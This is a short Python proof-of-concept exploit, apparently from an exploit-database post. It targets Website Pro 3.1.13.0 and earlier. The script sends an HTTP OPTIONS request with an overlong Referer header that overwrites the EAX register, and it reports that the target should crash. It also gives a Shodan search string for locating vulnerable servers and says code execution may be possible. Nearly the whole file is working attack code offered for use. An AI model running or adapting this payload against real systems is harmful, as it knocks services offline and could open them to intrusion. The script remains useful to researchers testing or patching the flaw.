#!/usr/bin/python
# Website Pro <= 3.1.13.0 "Referer:" Remote Buffer Overflow Crash PoC
# written by localh0t
# SHODAN Dork: "Server: Website/3.1"
# Date: 22/04/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Greetz: Inj3ct0r 1337day Exploit DataBase 1337day.com
# Note: The crash occurs when the application tries to write ECX (0x00000000) into the address that contains EAX (we control EAX) (0xBAADBEEF)
# Possible explotable, not tested yet.
from socket import *
import sys, struct, os, time
if (len(sys.argv) < 3):
print "\nWebsite Pro <= 3.1.13.0 \"Referer:\" Remote Buffer Overflow Crash PoC"
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
print "[!] Sending payload..."
payload = "A" * 996
payload += "\xEF\xBE\xAD\xBA" # EAX
payload += "C" * 2000
buffer = "OPTIONS / HTTP/1.1\r\n"
sock.send(buffer)
buffer = "Host: localhost\r\n"
sock.send(buffer)
buffer = "Referer: " + payload + "\r\n\r\n"
sock.send(buffer)
sock.close()
print "[!] Exploit succeed. Target should crashed."
sys.exit()
